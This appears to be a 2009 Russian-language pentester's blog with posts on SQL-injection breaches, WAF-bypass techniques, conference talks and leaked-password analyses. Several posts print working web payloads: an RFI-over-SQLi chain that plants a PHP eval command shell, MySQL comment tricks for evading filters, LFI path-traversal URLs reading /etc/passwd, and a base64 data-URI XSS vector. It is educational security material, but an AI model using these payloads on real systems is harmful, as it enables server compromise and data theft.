С наступающим 11111011010 годом!

Всем хорошо и с пользой провести новогодние праздники:) Удачных начинаний в новом году!

Скомпрометированы более 32 миллионов учетных записей (последствия атаки на сайт RockYou.com)

Стало известно, что хакеру, скрывающемуся под псевдонимом "igigi", удалось скомпрометировать базу пользователей сайта RockYou.com путем проведения атаки через классическую уязвимость SQL Injection. Портал RockYou.com предоставляет различные услуги социальным сетям, в том числе таким, как Facebook и MySpace. В своем блоге "igigi" подробно описывает проведенную им атаку. Наиболее ценными данными, которыми завладел хакер, является база пользователей на 32.603.388 позиций:


Обезличенная база паролей (без логинов, email’ов и другой чувствительной информации) была опубликованна на rapidshare.com, но на данный момент уже удалена и доступна только в торентах. Стоит заметить, что произошедший инцидент сумел попасть в TOP5 самых громких в уходящем году случаев утечки данных.

50 Ways to Inject Your SQL

Отличный видеоролик на тему SQL-инъекций:


Intel website hacked

Уже ставший известным широкой аудитории по взломам сайтов "Лаборатории Касперского", Symantec, etc, хакер Unu вновь напомнил о себе. На этот раз исследователь откопал SQL-инъекцию на сайте компании Intel (Intel Channel Webinars, channeleventsponsors.intel.com), который функционирует в рамках программы дистрибуции IT-гиганта.


Поверхностно пробежавшись по доступным таблицам, наш герой заметил хранящиеся пароли администраторов в plain-тексте, а также таблички с яркими именами колонок, говорящими сами за себя: id, card_type, passport_dob, passport_number, passport_issue, passport_expiry, passport_nationality, passport_name, phone_number_cell, address1, city, card_issue_number, card_expire_date, card_cvv.

Поломали Twitter

Забавными новостями пестрит сегодняшние новостные ленты: "Twitter подвергся дефейсу", "Twitter подвергся нападению иранских хакеров", "Twitter Defaced by Iranian Hacktivists", etc. И в доказательство приводятся красивые картинки проведенного "дефейса":



Безопасность языком цифр #7

Как показывают работы по оценке осведомленности пользователей, при массовой рассылке электронных писем, от 30% до 40% сотрудников осуществляют переход по сомнительной ссылке, содержащейся в рассылаемом сообщении. Подобная ситуация наблюдается при оценке осведомленности, проводимой впервые. Для компаний, которые проводят подобные работы в течение 3-4 лет цифры несколько ниже (15% - 20%):


Проводя анализ защищенности конфигурации клиентов в тихом режиме (респект Валере Марчуку), при посещении web-узла, указанного в электронном сообщении, в этом году получены следующие данные:


То есть, от 20% до 35% компьютеров позволяют выполнить произвольный код и до 85% компьютеров содержат уязвимости различной степени критичности. Само по себе, выполнение произвольного кода внутри защищаемого периметра на целевых объектах, в ряде случаев позволяет сменить тип атакующего с внешнего нарушителя на внутреннего.

RFI over SQL Injection/Cross-Site Scripting

Забавная атака была продемонстрирована при последнем пентесте. Хороший пример жизненного применения Cross-Site Scripting. Ситуация выглядела следующим образом:

- Пользовательский сегмент, из которого работает атакующий (я в его роли);
- Технологическая сеть, трафик из которой жестко режется;
- Уязвимое Web-приложение к Remote File Including (RFI), расположенное в технологической сети;
- Уязвимое Web-приложение к SQL-инъекции, аналогично дислоцирующееся в технологическом сегменте сети.

Сама по себе SQL-инъекция не позволяла реализовать какие-либо полезные угрозы для развития атаки (вот она страшная сторона минимизации привилегий!). Воспользоваться уязвимостью RFI тоже не удалось, потому, как исходящий трафик из технологической сети жестко резался в пользовательский сегмент и во внешний мир. Для того, чтобы проэксплуатировать уязвимость RFI, была воссоздана приблизительно следующая цепочка:

http://<уязвимое_приложение_к_RFI>/?param=http://<уязвимое_приложение_к_SQLi>/?param=1+union+select+'<?eval($_request[cmd]);?>'&cmd=passthru('ls');

Т.е., по отдельности все три уязвимости были бесполезными. И лишь объединившись для единой благой цели, позволили реализовать угрозу ИБ – выполнение команд на сервере:)


В общем-то, ничего сверхъестественного, но мне подобная атака показалась очень даже забавной...

Kaspersky Websites Hacked (round two)

Сайтам Лаборатории Касперского вновь досталось от "доброго" зохера, скрывающегося под псевдонимом Unu. В этот раз, атаке подверглись ресурсы www.kaspersky.com.my и www.kaspersky.com.sg. Как это не банально прозвучит, но прозохать сайты удалось через классическую SQL-инъекцию:



Сайты NASA подверглись хакерской атаке

Появилось сообщение о том, что сайты www.istd.gsfc.nasa.gov и www.sed.gsfc.nasa.gov подверглись хакерской атаке (в настоящее время оба сайта не ресолвятся). Инцидент начался с того, что на сайте www.sed.gsfc.nasa.gov была обнаружена классическая SQL-инъекция:


Как можно понять по приведенному выше скриншоту в качестве базы данных используется MySQL v.5.x, которая запущена под Windows 2/3k. Права пользователя, по всей видимости, не позволяют работать с файловой системой, но классическая инъекция под 5-м мускулем – это всегда очень приятно:) т.к. позволяет легко и просто восстановить всю структуру базы и после, не спеша, дампить содержимое всех таблиц в пространстве СУБД, до которых позволяют дотянуться права на основе таблицы разграничения доступа.

Материалы с мастер-класса по SQLi на Hackday#2

Собрав оставшиеся силы джедая после недельного пентеста в славном городе Київ, и после недолгой остановки в Москве на 8-9 часов, переместился я в культурную столицу нашей необъятной родины - Санкт-Петербург. В минувшие выходные в нем проходило мероприятие с громким названием "Hackday #2".

На мероприятии уже ближе к вечеру я провел мастер-класс по теме "Внедрение операторов SQL". "Велосипед" на этот раз не выдумывал (а его от меня там и не требовали), а просто воспользовался наработками, которые в свое время готовились для института МИФИ. Собственно, материалы мастер-класса, который по времени уместился в один час, представлены ниже.

Symantec has been hacked

Сейчас стало модным взламывать сайты антивирусных компаний :) Не обошло стороной это "счастье" и компанию Symantec, чей web-ресурс на днях был скомпрометирован через blind SQL Injection. Надо сказать, что за последнее время несколько крупных ресурсов было успешно атаковано с использованием уязвимости типа "Внедрение операторов SQL"[1,2,3].

Zero-day: Microsoft Internet Explorer

Появилось сообщение о том, что IE 6/7 содержат критическую уязвимость, позволяющую выполнить произвольный код на стороне клиента. По мнению SANS уязвимости также подвержен и Internet Explorer 8-й версии. Уязвимость связана с обработкой CSS/STYLE. Подробности здесь.

Metasploit Framework 3.3 Released

Metasploit Framework версии 3.3 доступен для скачивания. К сожалению, по информации из Release Notes, поддержка интерфейсов MSFGUI и MSFWEB прекращена:(( Однако в составе дистрибутива все еще содержится Metasploit Framework Web Console, а вот MSFGUI действительно отсутствует.


Подробности новой сборки.

Мероприятие: Платформа 2010


Даже при загруженности по работе, как 20/7 (4 на сон) я не мог пропустить пафосное мероприятие проводимое компанией Microsoft под названием "Платформа 2010". В этом году дислоцировалась Платформа в том же месте, что и Cisco Expo 2009, вместо уже привычного всем Ленинского проспекта (видимо решили сэкономить). Однако стоит сказать, что в отличие от Cisco, Microsoft развернулась, чуть ли не на все здание! Прогуливаясь по бесконечным коридорам отеля, семинары можно было встретить в самых неожиданных местах, впрочем, как и ребят в футболках, выполняющих роль проводников по зданию (а сколько там было security-парней! Чувство, что находишься в хранилище банка). Но об этом я узнал только потом. Первоначальной целью было посещение центра бесплатной сертификации от УЦ Ланит;)

Анализ защищенности Web-приложений

Довелось сегодня выступать на вебинаре по теме "Анализ защищенности Web-приложений, выявление уязвимостей в реальных условиях", который проходил в рамках онлайн-конференции iCoder. Надо сказать, несколько переоценил свои возможности по количеству рассказываемого материала... собственно, презентация с выступления:

Обзорная презентация по уязвимостям Web-приложений

Выложил презентацию по теме "Актуальные угрозы Web-приложений", которая готовилась для вебинара на firmbook.ru, но в том числе попала и на RIW //09.

Вот и дожили до кириллических DNS-имен

Случайно наткнулся на зеркало сайта iso27000.ru по адресу защита-информации.su:


Осознав, что вот и пришло время кириллических DNS-имен, первым делом проверил привычные инструменты:

ВАФ! Kaspersky тоже вроде WAF

Мои Позитивные коллеги тоже любят поиграться с sql injection:) Вот какое сообщение я наблюдал сегодня, когда виртуальная машина с лабораторной работой по sql-инъекциям была запущена на компьютере, где установлен KIS 2009:


Подобное сообщение можно увидеть, когда запрос содержит следующие ключевые слова и именно в такой последовательности:

/?id=1 union select password from users

Advanced SQL Injection lab (full pack)

По полученным просьбам, выкладываю полные оригиналы всех материалов, которые готовились для МИФИ по теме "Внедрение операторов SQL".

Оригинал презентации:

Еще один красивый способ эксплуатации SQL Injection в обход WAF

Метод, который попал мне сегодня на глаза в документации MySQL, поражает своей простотой и тем, что я не замечал его раньше. Раскопанный способ по обходу WAF заключается в следующем. Сервер MySQL позволяет использовать комментарии вида:

/*!sql-code*/ и /*!12345sql-code*/

Как можно догадаться, и в том, и в другом случае sql-code будет выполнен из комментария! Во втором случае конструкция означает, что нужно выполнить "sql-code", если версия СУБД больше этого цифрового значения.

Advanced SQL Injection

Проводил сегодня лабораторную работу в институте МИФИ по теме "Внедрение операторов SQL". Собственно, кастумизированная версия презентации с несколькими 0day методами и самыми актуальными техниками эксплуатации уязвимости SQL Injection представлена ниже.

RIW //09: RUSSIAN INTERNET WEEK

Выступал сегодня на мероприятии под названием "Неделя Российского Интернета (RIW-2009)" на тему "Угрозы ИБ при использовании Web-приложений". Надо сказать, что для многих присутствующих подготовленный мною материал, к сожалению, оказался несколько сложным... видимо, надо было подготовить, что-то "помягче".

Кстати, мероприятие проходило в том же месте, что и INFOSECURITY в далеком 2008 г. Из компаний в индустрии информационной безопасности присутствовала только "Лаборатория Касперского" на стенде которой был замечен Jackee Chan из известного ролика :-)

Позитивные вебинары

Команда Positive Technologies в конце этого и в начале следующего месяца примет участие в бесплатных вебинарах по информационной безопасности. Всем желающим послушать нас - welcome.

В рамках вебинаров, проводимых 1С-Битрикс/Lexton
Аудитория: Менеджеры, CIO, специалисты в области ИТ/WEB

29 октября 2009 11:30 - 12:30 "Актуальные угрозы Web-приложений"
Безопасностью Web-приложений большинство Компаний занимается по остаточному принципу. Такое положение вещей привело к тому, что в настоящее время внимание атакующего в первую очередь направлено на эксплуатацию уязвимостей именно в подобного рода сервисах. Незащищенный сайт является "лакомым кусочком" для злоумышленника. А возможные финансовые потери Компании, в случае успешной атаки, варьируются в широком диапазоне.

На вебинаре будет представлена Российская статистика уязвимостей Web-приложений. Будут озвучены наиболее часто встречаемые проблемы и недостатки при проектировании и использовании Web-приложений, а также возможные пути снижения рисков, связанных с угрозами в отношении Web-сервисов.
Докладчики: Евтеев Дмитрий, Александр Бородин (Lexton)


В рамках онлайн-конференции iCoder
Аудитория: Разработчики, программисты, специалисты в области ИБ

2 ноября 2009 10.00 - 12.00 "Security Development Lifecycle – задачи, методика построения, результаты"
  • Наиболее типичные ошибки программирования. (CWE/SANS Top 25 Most Dangerous Programming Errors)
  • Необходимость внедрения SDL
  • Microsoft Security Development Lifecycle:
    - Основные положения
    - Стадии Microsoft SDL
  • Технические средства, используемые в SDL:
    - Инструменты статического анализа
    - Защищенные версии наиболее опасных функций.
    - Опции компилятора, повышающие стойкость приложений к различным видам атак
    - Инструменты динамического анализа
    - Утилиты Fuzz-тестирования
Докладчики: Сергей Рублев, Андрей Абрамов

5 ноября 2009 12.00 - 14.00 "Анализ защищенности Web-приложений, выявление уязвимостей в реальных условиях"
Анализ защищенности Web-приложений – теория и практика.

Уязвимости и атаки на Web-приложения, общепринятые классификации уязвимостей. Ошибки, допускаемые разработчиками при создании клиентской и серверной частей Web-приложения, их возможные последствия и методы выявления и устранения. Примеры из практики. Обзор специализированных средств защиты Web-приложений: Web Application Firewall (WAF). Стоит ли полагаться на WAF?

Методология выявления уязвимостей в Web-приложениях, в частности, с использованием различных средств автоматического анализа.

Дополнительно более детально будут рассмотрены современные методы эксплуатации уязвимостей в Web-приложениях, такие как: HTTP Parameter Pollution, HTTP Parameter Fragmentation, Anti DNS Pinning и др.
Докладчики: Дмитрий Евтеев, Александр Анисимов

WASC Announcement: 2008 Web Application Security Statistics Published

Опубликована статистика уязвимостей Web-приложений за 2008 г. консорциума Web Application Security Consortium (WASC). Ознакомиться с ней можно здесь.

Публикация содержит обзорную статистику уязвимостей Web-приложений, полученную в ходе работ по тестированиям на проникновение, аудитов безопасности и других работ, проводимых Компаниями, входящими в консорциум WASC в 2008 году. Всего статистика содержит данные о 12186 сайтах, в которых было обнаружено 97554 уязвимости различной степени риска.

В результате собранных данных было получено 4 набора данных:
  • суммарная статистика по всем видам работ;
  • статистика по автоматическому сканированию;
  • статистика по оценке защищенности методом черного ящика;
  • статистика по оценке защищенности методом белого ящика.

Анализ полученных данных показывает, что более 13% всех проанализированных сайтов может быть скомпрометировано полностью автоматически. Около 49% Web-приложений содержат уязвимости высокой степеней риска (Urgent и Critical), обнаруженные при автоматическом сканировании систем. Однако при детальной ручной и автоматизированной оценке методом белого ящика вероятность обнаружения таких уязвимостей высокой степени риска достигает 80-96%. Вероятность же обнаружения уязвимостей степени риска выше среднего (критерий соответствия требованиям PCI DSS) составляет более 86% при любом методе работ. В то же время при проведении более глубокого анализа 99% Web-приложений не удовлетворяет требованиям стандарта по защите информации в индустрии платежных карт.

Cisco Expo 2009: Впечатления от мероприятия


Сразу хочу сказать, что от подобного мероприятия ожидал чего-то большего. И в целом, проходящая в этом году конференция Cisco Expo несколько разочаровала. И кухня была не такой пафосной, как в прошлом году, и стенд Positive Technologies был расположен в трудно отыскиваемом месте под лестницей... выступления, несомненно, были интересными, но видимо я пришел туда в неудачное время. Ну а так, как стенд Positive Technologies был свернут во второй день проведения мероприятия (нас не замечали под лестницей:-(( ), а знакомых лиц по близости не наблюдалось, то и мое пребывание на выставке было недолгим.

Про тонкую грань вредоносности ПО

И вновь столкнулся с примером false positive при определении степени вредоносности ПО. На этот раз – это всеми любимый XSpider:) английская редакция, сборка 2000.


Как вы понимаете, никакого троянца там и в помине нет. Просто файл "http.vsp" является модулем работы с протоколом HTTP. Для интереса ради, провел через Virustotal тот же файл из последней сборки XSpider 3230. Результаты такие.

Использование Null-byte в цифровых сертификатах

Поигрался сегодня с null-byte в SSL/TLS сертификатах по материалам securitylab. Действительно забавная бага. А какие перспективы открываются для MITM атак. Уязвимость до сих пор не исправлена в Microsoft crypto api, следовательно, up to date Internet Explorer уязвим для эксплуатации этой баги:


Phishing

Спецслужбы США и Египта провели совместную операцию Phish Phry, которая стала крупнейшей в истории интернета. В общей сложности в двух странах привлечено к уголовной ответственности 100 человек (53 в США и 47 в Египте), что является новым мировым рекордом по количеству выловленных хакеров за один раз. [1]

Андрей Абрамов (aka Stinger) дал свои комментарии радиостанции BBC в контексте phishing-угроз:



И в продолжение темы, небольшая статистика по фишингу от IBM.

С какой стороны ждать беды

За последнее несколько лет СМИ активно "смакует" угрозу со стороны внутреннего нарушителя. Но насколько реалии соответствуют "страшилкам"?


65% инцидентов – это атака внешним злоумышленником и банальная потеря данных (ноутбука, ленты, etc). Повышенное внимание к собственным сотрудникам, которым "в теории" проще украсть данные, ослабило бдительность в отношении внешних нарушителей. Угроза со стороны внутреннего "нарушителя" (именно нарушителя, как минимум вора, а не простого разгильдяя) несколько преувеличена. Сотрудник подписал множество документов при приеме на работу. Его ознакомили с политикой ИБ, используемой в компании. Пояснили, что все действия контролируются и мониторятся. В здравом уме далеко не каждый, готов будет совершить "подвиг". Его может остановить, простая логическая мысленная цепочка о том, что подобные действия не останутся незамеченными. Кроме того, сдерживающим фактором будет являться то, что разного рода "подвиги" будут отражены в трудовой книжке, что в свою очередь в значительной степени может усложнить дальнейшее существование (примеры есть. говорю не про себя:-)). Чего не скажешь про неуправляемого внешнего нарушителя, скрывающегося за ботнетом на другом континенте...

Анализ паролей пользователей Windows Live Hotmail

И вновь появилась новость о том, что по сети гуляет база учетных записей пользователей. На этот раз "под раздачу" попали пользователи Windows Live Mail. В первоисточнике сообщается, что в сети опубликовано более чем 10.000 паролей пользователей почтовой службы Hotmail. Ваш покорный слуга не мог пройти мимо, и недолгое гугление привело к истинному первоисточнику сего деяния. В настоящее время сервер pastebin.com работает нестабильно, а вот кеш google работает очень даже замечательно:)

Итак, во-первых, список опубликованных и отсортированных (без повторений) учетных записей начинается с буквы "a" и заканчивается буквой "b". Это свидетельствует о том, что полный список пользователей куда больше опубликованного в сети. Если предположить, что на каждую первую букву английского алфавита в списке приходится порядка 4.000-5.000 записей, то не трудно подсчитать, что полный список скомпрометированных учетных записей может достигать 150.000.

Во-вторых, из опубликованного списка в 10.028 записей, только 9.238 являются корректными. Если еще учитывать ограничивающую политику Hotmail, накладываемую при задании паролей (длина паролей не должна быть менее 6-ти символов), то результирующее количество "правильных" учетных записей в опубликованном списке содержится всего 8.250.

Насколько законны действия пентестера?

Катализатором к широким дискуссиям [1,2,3] на эту тему послужила "затравка" в блоге компании Infowatch. И после многочисленных рассуждений никто так и не предоставил конструктивных "выжимок", дающих однозначный ответ по поводу законности осуществляемых действий при проведении тестирований на проникновение. Более того, нашлись и те [4], кто помимо ст. 273 УК РФ (Создание, использование и распространение вредоносных программ для ЭВМ) сумел рассмотреть в действиях пентестера ст. 272 (Неправомерный доступ к компьютерной информации). Являясь непосредственным исполнителем при пентестах, опровергающее утверждение Ильи Медведовского, о том, что "в процессе активного аудита или тестов на проникновение аудиторы НЕ ПОЛУЧАЮТ непосредственно доступ к данным", мягко говоря "режет глаз" (без сбора и анализа информации пентест – не пентест, а лишь инструментальное обследование). Поэтому, проконсультировавшись с malotavr на данную тему, у меня сформировалась вполне объективная позиция относительно законности действий, осуществляемых при проведении пентестов.

INFOSECURITY 2009: Впечатления от посещения выставки

Для меня уже стало доброй традицией, каждый год посещать выставку по информационной безопасности INFOSECURITY, проходящей в Москве. Сегодня состоялся первый день этого мероприятия, и я решил поделиться своими впечатлениями...

В первую очередь стоит отметить, что на фоне предыдущих нескольких лет, INFOSECURITY 2009 выглядела весьма и весьма экономно. Оно, безусловно, понятно – мировой финансовый кризис. Поэтому не наблюдалось ни одного человека с ярко зелеными пакетиками от Dr.Web, которые пестрили в прошлые годы. Впрочем, и аналогичные пакеты красного оттенка с логотипом Лаборатории Касперского в руках посетителей выставки также отсутствовали. Масштабы выставки сократились. Стендов многих известных системных интеграторов и вендоров, которых можно было встретить в прошлые годы, не наблюдается. А само мероприятие проходит в трудно отыскиваемом павильоне под номером 7 Экспоцентра на Красной Пресне. Халявы стало меньше, но хватит о грустном:)

Прохождение CC2009 hack quest

Думаю, пришло время рассказать, как нужно (можно) было проходить этапы конкурса Hack Quest, в частности этапы конкурса, которые выложены на портале securitylab.

Об SQL Injection с улыбкой

Многие предприятия по разному стремятся уйти от налогов или сократить их до минимума. Для этого используют черную/двойную бухгалтерию и прочие противозаконные методы. Однако один предприимчивый деятель из Норвегии нашел изящный и остроумный ход, для того чтобы свести налоги к 0. В 1998 году он зарегистрировал предприятие, которое назвал ';UPDATE TAXRATE SET RATE = 0 WHERE NAME = 'EDVIN SYSE'.

Источник: http://spacel0rd.livejournal.com/426568.html

Vista BSOD 0day

Появился zero-day сплоит для Vista/Windows 7, позволяющий через SMB протокол отправить ось в синий экран. Раскопал багу ресерчер Laurent Gaffié.

А у меня все никак руки не доходили перезагрузить свою машину... так что проверено на себе, it works :)

Ссылки:
http://pentestit.com/2009/09/08/windows-vista-smb-remote-request-day/
http://security-sh3ll.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html

CC’09 завершен, Hack Quest продолжается!

Организаторы фестиваля Chaos Constructions и портал Securitylab предоставляют возможность проверить свои навыки "хакерства" всем желающим и пройти отдельные этапы Hack Quest, который был представлен на фестивале CC2009. Для подключения к конкурсу необходимо загрузить образы двух виртуальных машин (vmware) по следующим ссылкам:

http://download.securitylab.ru/cc09.part01.rar
http://download.securitylab.ru/cc09.part02.rar
http://download.securitylab.ru/cc09.part03.rar
http://download.securitylab.ru/cc09.part04.rar

Не случилось ли чего с nmap.org?

Странные вещи творятся. В конце августа был скомпрометирован сервер apache.org. Сейчас вот с nmap.org, что-то непонятное происходит:


Причем, к странице загрузок доступ есть:

HTTP Parameter Fragmentation (HPF) – один из способов обхода фильтров безопасности в Web-приложениях

Идея использования фрагментации предаваемых параметров (HPF) при обращении к Web-приложению с целью обхода фильтров безопасности (в частности WAF) не является сколь угодно новой. Данную технику, по словам одного из участников WASC Mailing List, эпизодически можно встретить в публикуемых эксплоитах на сайте milw0rm.com. Однако применение данной техники, в том числе и в настоящее время, позволяет эффективно обходить используемые фильтры в большинстве современных WAF (в частности промышленного - mod_security). В чем же суть данной техники? Разберем на примерах эксплуатации уязвимости SQL Injection.

Достаточно часто требуется, чтобы в один SQL-запрос попадало два и более параметра со стороны пользователя, например:

Query("select * from table where a=".$_REQUEST ['a']." and b>".$_REQUEST ['b']);

Query("select * from table where a=".$_REQUEST ['a']." and b<".$_REQUEST ['b']." limit ".$_REQUEST['c']);

и т.д.

Социальная сеть Facebook взломана. И вновь - SQL-Injection!

Интересные вещи творятся в начале месяца. Сегодня с утра "Rambler.ru приостановил работу из-за технических неполадок", "произошел сбой в работе Gmail", а к вечеру появилась новось о том, что "Facebook пал от SQL-Injection"... ах да, видимо каждый хочет проявить себя в сорокалетие Интернета по-своему :-)



Chaos Constructions '2009 (CC09) – подводя итоги

Компьютерный фестиваль CC09 завершен. И после нескольких бессонных ночей начинаем просыпаться, приходить в себя, а потому самое время, чтобы подвести итоги и поделиться впечатлениями.

Мероприятие прошло на позитивной волне (фотки), многие работы (демо && realtime coding) произвели на меня сильное впечатление и оставили приятный шлейф, что присутствую в этом коллективе. Вообще, безусловно, не часто встретишь столько талантливых людей в одном месте. Атмосфера на фестивале была замечательная! Но и имели место быть разного рода косяки с падением каналов и пр. в том числе в хак-зоне... Но они, конечно же, не могли испортить хорошего настроения, в котором все прибывали :)

Методы обхода Web Application Firewall

Бесспорно, использование WAF вызвано желанием снизить существующие угрозы со стороны атак, направленных на эксплуатацию уязвимостей в Web-приложениях.

Разработчики подобных фильтров обещают наиболее простое и дешевое решение "от всех проблем", а администраторы (в очередной раз) искренне верят в неприступность собственных систем. Но как будет рассказано на выступлении, WAF - это не долгожданная "серебряная пуля". Как и все, что создано человеком WAF имеет недостатки, которые позволяют воспользоваться уязвимостями даже на самых защищенных серверах.

YAHOO! взломали через банальную SQL Injection

Не каждый день ломают такие крупные проекты, как YAHOO. Поэтому мое внимание сразу же привлекла новость с блога Security-Shell о том, что сервис коммуникаций и обмена разнородной информацией YAHOO! Local был скомпрометирован с использованием самой обычной SQL Injection:


Использование замены null-byte в реальных условиях

Проводя тестирования на проникновение в отношении Web-приложений, построенных на PHP, такая полезная особенность интерпретатора, как альтернатива символу конца строки (\0), уже неоднократно позволяла успешно провести атаку типа Local File Including (LFI). На фоне этого появились некоторые наработки эксплуатации LFI c использованием метода по обходу null-byte [1,2,3].

Примеры разберем на up to date системе FreeBSD (7.2-RELEASE-p3) с php (5.2.10 with Suhosin-Patch 0.9.7).

<? include("q/".$_GET['f'].".txt"); ?>

Для выполнения атаки работает: /?f=../../../../../etc/passwd/.[N]/.
, где /.[N]/. - repeat("/.", 487)

<? include("qq/".$_GET['f'].".txt"); ?>

Предыдущий URL не позволит получить /etc/passwd. Но такой запрос успешно отработает:
/?f=/../../../../../etc/passwd/.[N]/.

<? include("qqq/".$_GET['f'].".txt"); ?>

Аналогично, предыдущий URL не позволит получить доступ к файлу. Сработает первый запрос: /?f=../../../../../etc/passwd/.[N]/.

и т.д. То есть, существует прямая зависимость между началом запросов выхода за каталог "../" и "/../" (кратная двум) от начала поступающих данных в функцию include(),require(), etc.

Другой пример кода:
<? include($_GET['f'].".txt"); ?>

Предыдущие запросы идут лесом. Отработает следующий URL:
/?f=non/../../../../../etc/passwd/.[N]/.

Таким образом, при эксплуатации LFI с использованием метода по обходу null-byte могут использоваться следующие запросы: "any/../file[N]", или "../../file[N]", или "/../../file[N]", где [N] замена null-byte, характерная для атакуемой ОС.

Web Hacking Incidents Database

Как-то так получилось, что стал собирать данные по инцидентам, связанных с антивирусными продуктами. На этой ноте решил в данном посте собирать данные по инцидентам, которые происходили по причине использования злоумышленниками уязвимостей в Web-приложениях.

В первую очередь, хотелось бы отметить Web Hacking Incidents Database (WHID), поддерживаемую и регулярно пополняемую консорциумом Web Application Security Consortium (WASC). Также, на мой взгляд, интересную статистику по тому же направлению предлагает компания Breach Security (данные по инцидентам за 2008 г./2009 г.).

Здесь наиболее оригинальное использование уязвимости в Web-приложении :) Хороший пример, насколько может быть опасно, в финансовой форме, нарушение целостности информации на сайте компании. Тут, продолжение истории.

И успешные пафосные атаки на web из недалекого прошлого: атака на MI5 и взлом почти статического сайта Кевина Митника :)

Сбор информации, как ключевой этап тестирования на проникновение

Действия атакующего (и пентестера) обычно разделены на следующие этапы:

  • Пассивный сбор информации;
  • Анализ собранной информации;
  • Активный сбор информации;
  • Проведение атаки.

При этом сбор и анализ информации, а также корректировка выбранных способов проникновения в информационную систему многократно могут повторяться. Первоначальный же сбор информации во многом является ключевым элементом проведения успешного и правильного пентеста. От того, насколько скрупулезно он был осуществлен, может зависеть, как эффективность пентеста в целом, так и эффективность отработки отдельных векторов атаки (социальная инженерия, брутфорс, атака на Web-приложения и пр.).

Выдержит ли Blogger.com DDoS?

Пару дней назад по непонятным причинам в районе 7-ми часов вечера наблюдал следующую картину:


Как теперь (мне) стало понятно, по всей видимости, гугль и не так уж и успешно справляется с DDoS-атакой, от которой уже падали ЖЖ, Facebook и Twitter. Подробности тут.

Интересные раскопки

Оказывается, присоединяться на 23/tcp порт браузером считает не безопасным! По крайней мере, так считает Opera.


Mozilla Firefox придерживается аналогичного мнения:


Russian Business Network

Познакомили меня сегодня с интересной сеточкой aka RBN (Российская Бизнес-сеть) – настоящий абузоустойчивый хостинг из России. Вот что о ней пишет вика: "Сеть возникла в качестве предоставления Интернет-услуг для детской порнографии, фишинга, распространения спама и вредоносных программ". Также ей приписывают заслуги по проведению DoS в 2007 г. на Эстонию и в 2008 г. на Грузию. Вот такая нехорошая сеточка, а тут диапазоны ip негодяев.

Забавный Microsoft

Сейчас сидел баловался с sqlmap, как вдруг перед глазами мелькнула надпись о том, что меня приветствует Microsoft Telnet-сервер. Первая мысль – прозохали:(( ан нет! Как оказалось это такая фича в windows 2k3 cmd-shell. Просто забыл поставить URI запрос в кавычки...


Забавная ситуация, но сердце екнуло:-))

Chaos Constructions '2009 (CC9)

Буквально через две недели состоится компьютерный фестиваль Chaos Constructions '2009 (CC9). В этом году активное участие в проведении конкурса HackQuest принимает команда Positive Technologies, в частности я и Андрей Абрамов (ака Stinger). Разработка всех этапов конкурса почти завершена, и в скором времени (до наступление CC) мы в своей сети поиграем в хакеров:), дабы убедиться, что участники конкурса смогут за приемлемое время пройти все его этапы. Конкурс будет действительно интересным и увлекательным. Для того, чтобы немного снять напряжение при "мозговом штурме" в творческом процессе взлома, конкурс напичкан "пасхальными яйцами":) (надеюсь, участникам конкурса они покажутся забавными).

Кроме HackQuest, команда Positive Technologies также принимает участие в проведении конкурса по обходу проактивного фильтра WAF, работающего под CMS Bitrix. В частности я занимаюсь тем, чтобы коммуникатор не получил никто:)) либо получил не за взлом, а в качестве поощрительного приза... Конкурс по обходу Bitrix WAF проходит в рамках фестиваля CC09, но также будет доступен из сети Интернет. Следите за новостями и welcome!

Атака на Active Directory

В свое время я рассказывал про брешь в системе информационной безопасности Active Directory, которая повсеместно встречается в большинстве компаний. Брешь связана с включенной локальной учетной записью дефалтового администратора на рабочих местах корпоративных пользователей. Тогда я рассуждал о том, что существует вероятность компрометации пароля для этой учетной записи, например, с использованием "радужных таблиц", и как следствие, компрометация других доменных компьютеров (в лучшем случае компьютеров непривилегированных пользователей и не компьютеров из отдела бухгалтерии;)). Однако, зачем нам пароль, когда у нас на руках LM&NTLM хеш? Правильно, тратить время на восстановление пароля совершенно не нужно – Pass-The-Hash решит задачу дешево и сердито.

Потому в очередной раз напоминаю, что в доменной архитектуре локальная учетная запись не требуется! И даже будучи отключенной, она доступна при загрузке в безопасном режиме.

PS: действо с отключением локальной учетной записи администратора вовсе не означает, что для нее не нужно регулярно менять используемый пароль, т.к. стоит только немного расслабиться, как инсайдер задерживаясь на работе дольше остальных, начнет сливать информацию с чужих компьютеров, загружаясь в безопасном режиме:)

Оригинальный Cross-Site Scripting

И на какие только трюки не идет атакующий, чтобы успешно провести эксплуатацию уязвимости XSS. Чего только стоит взрыв мозга после прочтения материалов Эдуардо Вела (Eduardo Vela) и Дэвида Линдсэй (David Lindsay) на тему реализации XSS-атак, представленных на прошедшей конференции BlackHat. Но время не стоит на месте, и мы продолжаем знакомиться с новыми векторами реализации XSS.

Используете Opera или Firefox 3.x? Тогда копипастим в адресную строку следующее:
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=


Вроде ничего страшного? Однако, подобная "фича" этих браузеров может реально использоваться "в живой природе" для проведения вполнее себе пригодной атаки Cross-Site Scripting.

ЗЫ: для тех же целей также работает следующая конструкция «javascript:window.location = "http://www.google.com/"»

ВКонтакте, QIP, Who following?

Не успели в Интернете перетереть утечку пользователей социальной сети ВКонтакте, как с небольшим отрывом появилась новость о раскопках утекших пользователей системы мгновенных сообщений QIP. Остается лишь добавить, кто будет следующим? ...и во время подсуетиться:))

Анализ паролей пользователей ВКонтакте (поправка)

Как это часто бывает, поспешные выводы могут не учитывать некоторых деталей, которые в свою очередь приводят к некорректным умозаключениям. После комментария в предыдущем посте мне ничего не остается, как признать, что не заметил очевидных вещей – используемую парольную политику "ВКонтакте". А она следующая: "Пароль должен быть не менее 6 символов в длину и не должен состоять только из цифр, либо содержать недопустимые символы". Какие символы являются недопустимыми, можно только догадываться. Но, по всей видимости, это непечатные символы ASCII.

Анализ паролей пользователей ВКонтакте

Появилась новость о том, что по сети гуляют данные учетных записей более чем 130 тысяч пользователей социальной сети vkontakte.ru. Ваш покорный слуга не мог пройти стороной и также скачал себе экземплярчик этой базы, исключительно с целью проанализировать, насколько сильно разняться пароли, используемые нашими соотечественниками на публичных и корпоративных ресурсах.

NMAP наше всё

Приятное впечатление на меня сегодня произвело default syn-сканирование nmap'ом 5-ой ветки, который был зарелизен совсем недавно. Так выглядит скан сети /22 nmap версии 5:
# Nmap done: 1024 IP addresses (73 hosts up) scanned in 67.75 seconds

Аналогичный скан nmap версии 4.76:
# Nmap done: 1024 IP addresses (73 hosts up) scanned in 2012.50 seconds

